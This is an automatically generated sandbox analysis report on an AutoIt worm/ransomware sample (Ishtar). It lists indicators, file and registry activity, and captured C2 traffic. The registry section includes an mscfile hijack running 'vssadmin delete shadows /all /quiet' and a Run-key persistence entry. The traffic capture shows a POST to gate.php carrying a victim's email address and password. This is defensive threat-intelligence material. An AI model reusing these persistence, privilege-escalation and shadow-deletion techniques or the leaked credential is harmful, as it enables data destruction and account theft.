Worm.Win32.AutoItGen_aacc754ec9

by malwarelabrobot on March 26th, 2018 in Malware Descriptions.

Trojan.RansomKD.12614230 (BitDefender), HEUR:Trojan.Script.Generic (Kaspersky), Trojan.Encoder.7240 (DrWeb), Trojan-Ransom.Ishtar (A) (Emsisoft), Trojan.Gen (Symantec), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Ransom, Trojan, Worm, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: aacc754ec9d2c845825c2e1a1518cbe5
SHA1: c837085e2303b8f72bb1bd93fd48d47c1afe6e94
SHA256: 61cb4b4b36ac067ddeb17fe30e8ee7ed4cfa54c82bb6119409a79f2a56656203
SSDeep: 49152:Zw80cTsjkWaFLEkAVhpGxXgVJVXTvBZA1Vs:28sjkepzVJ/4s
Size: 2170293 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-12-05 23:29:40
Analyzed on: Windows7 SP1 32-bit


Summary:

Worm. A program that replicates primarily over networks or removable drives.

Payload

No specific payload has been found.

Process activity

The Worm creates the following process(es):

%original file name%.exe:1828
eventvwr.exe:3976
Kb8K11.exe:2916
Kb8K11.exe:1812
Kb8K11.exe:2992
Kb8K11.exe:2980
Kb8K11.exe:1008

The Worm injects its code into the following process(es):

Kb8K11.exe:3060

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1828 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\Desktop\aacc754ec9d2c845825c2e1a1518cbe5.docx (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe (15424 bytes)

The process Kb8K11.exe:2916 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.tmp (1 bytes)

The process Kb8K11.exe:2992 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\~pE6D0A8772EB1.tmp (221 bytes)

The process Kb8K11.exe:2980 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\~mE6D0A8772EB1.tmp (280 bytes)

The process Kb8K11.exe:3060 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\ProgramData\VMware\VMware Tools\manifest.txt (345 bytes)
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg (2631 bytes)
C:\totalcmd\SIZE!.TXT (1419 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\README-ISHTAR.txt (1 bytes)
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg (2152 bytes)
C:\totalcmd\HISTORY.TXT (1613 bytes)
C:\totalcmd\DEFAULT.BAR (2187 bytes)
C:\ISHTAR.DATA (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ISHTAR.DATA (143 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\googledesktop.txt (1227 bytes)
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg (1398 bytes)
C:\totalcmd\KEYBOARD.TXT (852 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\win7gadgets.txt (1035 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\vistasidebar.txt (2059 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\microsoftoffice2003.txt (1163 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\adobephotoshopcs3.txt (714 bytes)
C:\totalcmd\NO.BAR (299 bytes)
C:\Users\"%CurrentUserName%"\Desktop\aacc754ec9d2c845825c2e1a1518cbe5.docx (566 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt (435 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\vmwarefilters.txt (26 bytes)
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg (2252 bytes)
C:\README-ISHTAR.txt (1 bytes)
C:\totalcmd\REGISTER.RTF (200 bytes)
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg (2389 bytes)
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv (5351 bytes)
C:\Users\"%CurrentUserName%"\Documents\Outlook Files\mar.kus@bigmir.net.pst (608 bytes)
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg (1474 bytes)
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg (2391 bytes)
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg (2128 bytes)
C:\Users\"%CurrentUserName%"\Desktop\README-ISHTAR.txt (1 bytes)
C:\ProgramData\VMware\VMware Tools\Unity Filters\visualstudio2005.txt (523 bytes)
C:\Users\"%CurrentUserName%"\Desktop\ISHTAR.DATA (1 bytes)

The Worm deletes the following file(s):

C:\ISHTAR.DATA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\~mE6D0A8772EB1.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\~pE6D0A8772EB1.tmp (0 bytes)

The process Kb8K11.exe:1008 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\~mE6D0A8772EB1.tmp (280 bytes)

Registry activity

The process %original file name%.exe:1828 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:

[HKCU\Software\Ishtr 1.0]
"Start" = "Success"

[HKCU\Software\Classes\Local Settings\MuiCache\66\52C64B7E]
"LanguageList" = "en-US, en"

To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe"

The process eventvwr.exe:3976 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Worm deletes the following value(s) in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Kb8K11.exe:3060 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Ishtr 1.0]
"Eop" = "Success"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\mscfile\shell\open\command]
"(Default)" = "C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet"

[HKLM\SOFTWARE\Microsoft\Tracing\Kb8K11_RASMANCS]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: Language Neutral

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text   4096             580910        581120    4.62736   c2c2260508750422d20cd5cbb116b146
.rdata  585728           188686        188928    3.99304   4513b58651e3d8d87c81a396e5b2f1d1
.data   778240           36724         20992     0.830952  c2de4a3d214eae7e87c7bfc06bd79775
.rsrc   815104           165032        165376    5.29919   b0b5946572fef8162766391fbf570b57
.reloc  983040           28976         29184     4.70119   1254908a9a03d2bcf12045d49cd572b9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
f3ab5ab78854b664a9e050673e1f4fcf

URLs

URL                               IP
hxxp://bit.ly/2fmwcur             67.199.248.10
hxxp://46.45.138.138/pw/gate.php
www.google.ru                     216.58.215.99
www.google.com                    216.58.215.100


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad
ET TROJAN Trojan Generic - POST To gate.php with no referer

Traffic

POST /pw/gate.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 46.45.138.138
Content-Length: 309
Connection: Keep-Alive
Cache-Control: no-cache

DATA:Local Admin,Windows 7 Ultimate,WIN-UK0FFOO83I6
Mark,MS Outlook 2002/2003/2007/2010,mar.kus@bigmir.net,pop.bigmir.net,,No,POP3,mar.kus@bigmir.net,gfhjkm123!,Outlook,Strong,smtp.bigmir.net,

URL,Web Browser,User Name,Password,Password Strength,User Name Field,Password Field,Created Time,Modified Time

HTTP/1.1 404 Not Found
Date: Sun, 25 Mar 2018 01:12:51 GMT
Server: sopws
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Accept-Ranges: bytes
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=1000
Transfer-Encoding: chunked
Content-Type: text/html

<<< skipped >>>

GET /2fmwcur HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bit.ly


HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 25 Mar 2018 01:11:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 109
Connection: keep-alive
Cache-Control: private, max-age=90
Location: hXXps://VVV.google.ru/
Set-Cookie: _bit=i2p1bX-1eca6060fd861e8dc3-00T; Domain=bit.ly; Expires=Fri, 21 Sep 2018 01:11:59 GMT

<html>
<head><title>Bitly</title></head>
<body><a href="hXXps://VVV.google.ru/">moved here</a></body>
</html>


The Worm connects to the servers at the following location(s):

SearchProtocolHost.exe_776:


SearchFilterHost.exe_4040:


Kb8K11.exe_3060:


vssvc.exe_2220:

WaitForSingleObject(%p,INFINITE) == WAIT_FAILED, GetLastError() == 0xlx, m_eThreadState == %d
d:\w7rtm\base\stor\vss\modules\coord\src\lovelace.cxx
Volume %s is assigned flush level %d
Volume %s is nested beyond the nested volume snapshot limit
Lovelace failed to hold writes at volume %d - '%s'
WaitForMultipleObjects(%d,%p,1,%d) == 0xlx
It took longer than %d seconds to send %d releases
Volume %s has a dependent volume %s that is already in the set
Nested volume %s has a parent volume %s that is already in the set
Lovelace(%s)
Bad state %d.
Current state %d. Reset to initializing
It took longer than %d seconds to flush %d volumes
Starting flush & hold on all volumes at level %d
timed out waiting for release writes to start for %s
WaitForSingleObject(%p,%d) == [0xlx]
timed out waiting for flush and hold to start for %s
The maximum number (%d) of Lovelace threads was reached.
It took longer than %d seconds to flush %d volumes
It took longer than %d seconds to open %d handles
Error starting the job %d [0xlx].
Error preparing the job %d [0xlx].
d:\w7rtm\base\stor\vss\modules\coord\src\provideroperation.cxx
CVssQueuedProviderOperation::OnFinish
CVssQueuedProviderOperation::OnTerminate
CVssQueuedProviderOperation::OnInit
CVssQueuedProviderOperation::OnCommitSnapshots
CVssQueuedProviderOperationList::WaitForFinish
bCVssQueuedProviderOperation::Initialize
CVssQueuedProviderOperation::OnRunCallback
CVssQueuedProviderOperationList::Reset
CVssQueuedProviderOperationList::PrepareToCommitSnapshots
CVssQueuedProviderOperationList::CommitSnapshots
CVssQueuedProviderOperation::ProviderOperationCallback
CVssQueuedProviderOperation::OnRun
CVssQueuedProviderOperationList::~CVssQueuedProviderOperationList
CVssQueuedProviderOperation::Initialize failed
CVssQueuedProviderOperationList::AddProviderOperation
Provider operation does not exist
CVssQueuedProviderOperationList::RemoveProviderOperation
]d:\w7rtm\base\stor\vss\modules\coord\src\snap_set.cxx
Fail to find client PID winerr %d HRESULT 0xlx
Freeze(%s,%d)
Abort(%s)
PrepareForSnapshot(%s,%s)
PostSnapshot(%s)
bIsDiskMaskPossible for ThawWriters = %s
bIsDiskMaskNeeded for ThawWriters = %s
Thaw(%s)
Volume %s not supported by any provider
Cannot convert volume name %s to a GUID
CVssSnapshotSetObject::GetSupportedProviderId
Fail to construct user account winerr %d HRESULT 0xlx
Fail to write to destination buffers winerr %d HRESULT 0xlx
Fail to find client process account winerr %d HRESULT 0xlx
Fail to convert client process token to sid string winerr %d HRESULT 0xlx
Converting 0xlx to VSS_E_NO_SNAPSHOTS_IMPORTED
Routine ImportSnapshotSet failed with 0xlx
Providers map loaded successfully - number of providers is: %d
CVssSnapshotSetObject::DoImportSnapshots
Fail resync operation
Warning: Error deleting the provider commit operation 0xlx
BeginPrepareSnapshot({%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x},{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x},%s)
Context %d not supported by provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Volume %s has too many snapshots{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Volume %s not supported by provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Error adding volume %s to the thread set. 0xlx
Volume %s not supported by provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}in the context %ld
Transportable snapshot. Don't log on creation until import.
d:\w7rtm\base\stor\vss\modules\coord\src\mgmt.cxx
IVssSnapshotProvider::QueryVolumesSupportedForSnapshots(ProviderId,%ld,...)
CVssSnapshotMgmt::QueryVolumesSupportedForSnapshots
IVssSnapshotProvider::QuerySnapshotsByVolume(%s,...)
pwszVolumeName = %s
d:\w7rtm\base\stor\vss\modules\coord\src\callback.cxx
Error querying for the IDispatch interface. hr = 0xx
d:\w7rtm\base\stor\vss\modules\coord\src\softwrp.cxx
d:\w7rtm\base\stor\vss\modules\coord\src\hardwrp.cxx
CVssHardwareProviderWrapper::Initialize
CVssHardwareProviderWrapper::QueryInterface
CVssHardwareProviderWrapper::AddRef
CVssHardwareProviderWrapper::RevertToSnapshot
CVssHardwareProviderWrapper::QueryRevertStatus
CVssHardwareProviderWrapper::CheckContext
Cluster Node detection failed! [GetLastError() = %dL]
CVssHardwareProviderWrapper::CVssHardwareProviderWrapper
CVssHardwareProviderWrapper::QueryInternalInterface
CVssHardwareProviderWrapper::BuildSnapshotProperties
CVssHardwareProviderWrapper::FindSnapshotProperties
CVssHardwareProviderWrapper::EndPrepareSnapshots
CVssHardwareProviderWrapper::PreCommitSnapshots
CVssHardwareProviderWrapper::CommitSnapshots
CVssHardwareProviderWrapper::PostCommitSnapshots
DeletedSnapshots = %d
CVssHardwareProviderWrapper::AbortSnapshots
CVssHardwareProviderWrapper::OnLoad
CVssHardwareProviderWrapper::OnUnload
CVssHardwareProviderWrapper::HWDIAG_OnLoad
* PARAM IN: bForceUnload = %s
CVssHardwareProviderWrapper::HWDIAG_OnUnload
* PARAM OUT: bIsSupported = %lu (%s)
* RETURN: m_pHwPrv->AreLunsSupported() returned 0xlx
* CALL: m_pHwPrv->AreLunsSupported() ...
* PARAM IN: rgwszDevices[%d] = 0xlx
* PARAM IN: lLunCount = %d
CVssHardwareProviderWrapper::HWDIAG_AreLunsSupported
* PARAM IN: wszDeviceName = %s
CVssHardwareProviderWrapper::HWDIAG_FillInLunInfo
CVssHardwareProviderWrapper::HWDIAG_BeginPrepareSnapshot
* PARAM IN: rgwszDevices[%d] = %s
CVssHardwareProviderWrapper::HWDIAG_GetTargetLuns
CVssHardwareProviderWrapper::HWDIAG_LocateLuns
* PARAM IN: wszDevice = %s
CVssHardwareProviderWrapper::HWDIAG_OnLunEmpty
CVssHardwareProviderWrapper::HWDIAG_OnLunStateChange
CVssHardwareProviderWrapper::HWDIAG_EndPrepareSnapshots
CVssHardwareProviderWrapper::HWDIAG_PreCommitSnapshots
CVssHardwareProviderWrapper::HWDIAG_CommitSnapshots
CVssHardwareProviderWrapper::HWDIAG_PostCommitSnapshots
CVssHardwareProviderWrapper::HWDIAG_AbortSnapshots
CVssHardwareProviderWrapper::HWDIAG_PreFinalCommitSnapshots
CVssHardwareProviderWrapper::HWDIAG_PostFinalCommitSnapshots
CVssHardwareProviderWrapper::AppendToGlobalList
CVssHardwareProviderWrapper::RemoveFromGlobalList
QI for IVssHardwareSnapshotProviderEx failed with %#x
CVssHardwareProviderWrapper::CreateInstance
BeginPrepareSnapshot({%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x},%s)
Context %d not supported on volume %s by provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
volume is not supported
IsVolumeSupported
CVssHardwareProviderWrapper::BeginPrepareSnapshot
Calling OnLunEmpty on LUN no %u after a post-export failure
OnLunEmpty for LUN no %u returned hr=0xlx
Calling OnLunEmpty on LUN no %u after a post-export cancel
PostSnapshots is prior to cleanup code: ft.hr=0xlx bGetTargetLunsSucceeded=%s cTotalLuns=%u
No snapshots were successfully imported for snapshot set {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
IVssHardwareSnapshotProvider::GetTargetLuns
CVssHardwareProviderWrapper::PostSnapshot
CVssHardwareProviderWrapper::GetSnapshotPropertiesInternal
CVssHardwareProviderWrapper::IsVolumeSnapshotted
CVssHardwareProviderWrapper::PreFinalCommitSnapshots
CVssHardwareProviderWrapper::PostFinalCommitSnapshots
CVssHardwareProviderWrapper::SetExposureProperties
Parameters: SnapshotId: {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, eSnapshotPropertyId = %d, vProperty = %s
Invalid variant %ul for property %d
Invalid property %d
CVssHardwareProviderWrapper::SetSnapshotProperty
IVssSnapshotSnapshotProvider::AreLunsSupported failed with error 0xlx
CVssHardwareProviderWrapper::IsVolumeSupported
CVssHardwareProviderWrapper::~CVssHardwareProviderWrapper
CVssHardwareProviderWrapper::Release
CVssHardwareProviderWrapper::EnumerateSnapshots
Parameters: QueriedObjectId = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}eQueriedObjectType = %d. eReturnedObjectsType = %d, ppEnum = %p
CVssHardwareProviderWrapper::Query
d:\w7rtm\base\stor\vss\modules\coord\src\rescan.cxx
CVssHardwareProviderWrapper::GetInterfaceDetailData
IOCTL_SCSI_RESCAN_BUS failed with error (%d)
Could not open channel to %s
Reenumerating devices on DEVINST %s...
CVssHardwareProviderWrapper::ReenumerateDevices
CVssHardwareProviderWrapper::DoRescanForDeviceChanges
%sSystem Volume Information\{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}.%s
System Volume Information\{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}.%s
{7cc467ef-6865-4831-853f-2a4817fd1bca}ALT
{7cc467ef-6865-4831-853f-2a4817fd1bca}DB
d:\w7rtm\base\stor\vss\modules\coord\src\hwwrpdb.cxx
CVssHardwareProviderWrapper::GetBootDrive
CVssHardwareProviderWrapper::MoveDatabase
CVssHardwareProviderWrapper::DeleteDatabase
CVssHardwareProviderWrapper::GetDatabasePath
%sSystem Volume Information
CVssHardwareProviderWrapper::CreateDataStore
CVssHardwareProviderWrapper::OpenDatabase
CVssHardwareProviderWrapper::OpenAlternateDatabase
CVssHardwareProviderWrapper::LoadData
CVssHardwareProviderWrapper::SaveData
CVssHardwareProviderWrapper::CheckLoaded
CVssHardwareProviderWrapper::TrySaveData
DefineDosDevice(%s, %s) [%ld]
Invalid device %s
d:\w7rtm\base\stor\vss\modules\coord\src\hwdelete.cxx
CVssHardwareProviderWrapper::SetDosDevice
CVssHardwareProviderWrapper::UninstallDevice
REBOOT required! devParams.Flags & (DI_NEEDRESTART | DI_NEEDREBOOT) [0xlx] device=(%s)
SetupDiGetDeviceInstallParams(DevInfo, DevInfoData, &devParams) - %s
Checking for reboot on removing/reinstalling device %s
CVssHardwareProviderWrapper::IsRebootRequired
CVssHardwareProviderWrapper::CheckAllSignaturesRevertable
OnLunStateChange(%s) failed with error 0x%8lx
OnLunEmpty(%s) failed with error 0x%8lx
IVssSnapshoProviderProvider::FillInLunInfo(%s) failed with error 0xlx
CVssHardwareProviderWrapper::NotifyDriveFree
Can't build LUN info for the volume %s. Ignoring.
Cannot notify legacy provider for '%s'
CVssHardwareProviderWrapper::NotifyVolumeOnReadWrite
Notifying hardware provider about lun being mounted %s for recovery
CVssHardwareProviderWrapper::NotifyVolumeOnRecovery
Fail to find a volume manager that supports the required dynamic disks
CVssHardwareProviderWrapper::BuildClosure
QueryDosDeviceW(%s) [%ld]
Symlink: %s...
Invalid device prefix %s
StringCbCopyW(%p,%d,%s)
Device found: %s...
CVssHardwareProviderWrapper::GetDosDevice
dNtCreateSymbolicLinkObject failed with status %d
CVssHardwareProviderWrapper::CreateSymbolicLinkW
Found volume device -- %s
SetupDiEnumDeviceInterfaces(devInfo, NULL, &, [%d], &)
Volume device path: %s
Get info on volume devnode %s...
CVssHardwareProviderWrapper::GetVolumeDevinfo
SetupDiGetDeviceRegistryProperty(devInfo, NULL, &, [%d], &)
Examining device %s
Get info on hidden volume devnode %s...
CVssHardwareProviderWrapper::GetHiddenVolumeDevinfo
GetVolumeNameForVolumeMountPoint(%s) fail with 0xlx
GetVolumeNameForVolumeMountPoint(%s) fails with 0xlx
GetVolumePathName(%s) failed with 0xlx
NetShareEnum failed with %d
GetVolumeNameForVolumeMountPoint(%s)
GetVolumePathNamesForVolumeName(%s) failed with 0xlx
CVssHardwareProviderWrapper::CollectSharesAndMountPointsOnVolume
Wait operation timed out without finding all hidden volumes, attempt %d.
IOCTL_DISK_SET_DISK_ATTRIBUTES fails to online %s
Signature for disk %s reverted
Could not revert the signature for disk %s
IOCTL_DISK_SET_DISK_ATTRIBUTES fails to offline %s
CVssHardwareProviderWrapper::ReOnlineDiskAndWaitForVolumeOnBreak
Decremented expected device count %d --> %d
GetVolumeNameForVolumeMountPoint(%s) fail on second time. with 0xlx. We cannot accept this volume
GetVolumeNameForVolumeMountPoint(%s) fails with 0xlx. We cannot accept this volume
Found new volume with matching disk id at path %s on local disk no %d. Ending wait.
Arrived volume %s disk id not matched with pre-reverted disk id. Continuing wait.
Fail to find HwSnapshotInfo for volume %s, disk no %d
Arrival of dynamic volume of %d extents. Ignoring.
CVssHardwareProviderWrapper::OnVolumeArrivalForBreak
NetShareAdd(%s, %s) failed with %d
NetShareDel(%s) failed with %d
Fail to restore all mount points for %s. [0lx]. Continuing.
SetVolumeMountPoint(%s, %s) fails with 0xlx
Fail to delete mount point %s for volume %s, winerror %d
GetVolumePathNamesForVolumeName(%s) fails with 0xlx
CVssHardwareProviderWrapper::RestoreSharesAndMountPointsOnVolume
CreateFile(%s) failed with [0xlx]
Opening snapshot device: %s ...
Getting snapshot with index %d...
- Deleted snapshot[%d] {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Checking if the disk %d is in use by other un-deleted snapshots in the set
CVssHardwareProviderWrapper::IsDiskUnused
CVssHardwareProviderWrapper::UninstallDisks
Dismount of RAW disk %s failed
Disk %s is not required to be deleted
Unable to get the disk number of %s
CVssHardwareProviderWrapper::OnDiskFoundForDelete
Decremented expected volmgr count %d --> %d
DiskClosureGuidsToDiskNumbers fails. [winerror %d]
IOCTL_VOLMGR_GET_CLOSURE fails. [winerror %d]
Checking volmgr %s
CVssHardwareProviderWrapper::OnVolmgrFoundForClosure
IOCTL_VOLMGR_SPLIT_DISKS fails. [winerror %d]
CVssHardwareProviderWrapper::SplitDisksFromSourceToTarget
CVssHardwareProviderWrapper::OfflineDynamicDisks
CreateSymbolicLink(%s,%s) failed
SetDosDevice(%s, %s) failed
GetDosDevice(%s) fails
DeviceIoControl(%s, IOCTL_VOLUME_ONLINE) fails: [0xlx]
CreateFile(%s) failed: [0xlx]
Disk %d still has snapshots on it
Uninstalling volume device: %s
Removing mount points from volume device %s
Failed to to dismount the volume: %s [0lx]
Failed to get the volume extents: %s [0lx]
Failed to open the volume: %s [0lx]
%s snapshot %s, %s
CVssHardwareProviderWrapper::ProcessDeletedVolume
CVssHardwareProviderWrapper::OperateDisksForBreakSnapshotSet
CVssHardwareProviderWrapper::InternalDeleteSnapshotSet
CVssHardwareProviderWrapper::InternalDeleteSnapshot
CVssHardwareProviderWrapper::BreakSnapshotSet
Force flag given but registry key SYSTEM\CurrentControlSet\Services\VSS\Settings, value name BlockSignatureRevert.
CVssHardwareProviderWrapper::BreakSnapshotSetEx
CVssHardwareProviderWrapper::DeleteAutoReleaseSnapshots
CVssHardwareProviderWrapper::DeleteSnapshotsInternal
ImportTimeoutScaleFactor
d:\w7rtm\base\stor\vss\modules\coord\src\hwimport.cxx
Error reading registry settings for the Import scale factor: 0xlx
scale factor: %u
CVssHardwareProviderWrapper::IsLunIdExpected
CVssHardwareProviderWrapper::DoRescan
Non-seqential extents that span Disk %d and Disk %d, whereas they appear sequentially on Disk %d for other volume.
Sequential extents on Disk %d are not sequential on other volume, they span Disk %d and Disk %d
CVssHardwareProviderWrapper::IsMatchingDiskExtents
CVssHardwareProviderWrapper::IsConflictingIdentifier
CVssHardwareProviderWrapper::DeleteLunMappingStructure
max total sleep time: %d
max retries: %d
Import fails because not all disks arrived in the system. Cannot online disks to get volumes.
- The Import will fail with VSS_E_NO_SNAPSHOTS_IMPORTED (0x80042320)
- PnP takes too much time to install/create the new disk devices. Look in setupapi.log
- Bug in the storage array: The disk shows as Read-Only (Read/Only LUNs are not supported by VSS HW infrastructure)
Wait operation timed out without exposing snapshotset, attempt %d.
CVssHardwareProviderWrapper::ExposeDisks
We find arrived disk %s has no LUN id and is not a snapshot disk arrival
Disk no %d
INFO: All disk devices for the volume (mapping index %d) are now exposed.
Arrived Disk %s does not have a matching LUN id Ignoring...
Arrived disk %s as inluded LUN id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Disk %s is in state %d and has LUN id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} and disk no %d
Can't to build Lun info for drive %s . Ignoring
%s - %s
%s disk found: %s
CVssHardwareProviderWrapper::OnDiskArrival
Volume at mapping index %d spans the same disk(s) as the arrived one but has different disk extents, volume is not matched.
Volume at mapping index %d doesn't span the same disks as the one that arrived
Not all disks for volume %s were expected. The volume is not matched and is ignored.
Volume %s spans disk %d with Lun id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} which is NOT included in the set of LUN ids expected to arrive.
Can't build LUN info for the %s hidden volume %s. Ignoring.
%s hidden volume %s found. Checking state of each extent
CVssHardwareProviderWrapper::OnHiddenVolumeArrival
Not all disks for volume %s were expected. The volume cannot be matched and is ignored.
Can't build LUN info for the %s volume %s. Ignoring.
%s volume %s found. Checking state of each extent
CVssHardwareProviderWrapper::OnVolumeArrival
CVssHardwareProviderWrapper::IsMatchPage80
Match found: ID1 = %d, ID2 = %d
CVssHardwareProviderWrapper::IsMatchDeviceIdDescriptor
CVssHardwareProviderWrapper::BuildVolumeMapping
Found volume name %s for device %s
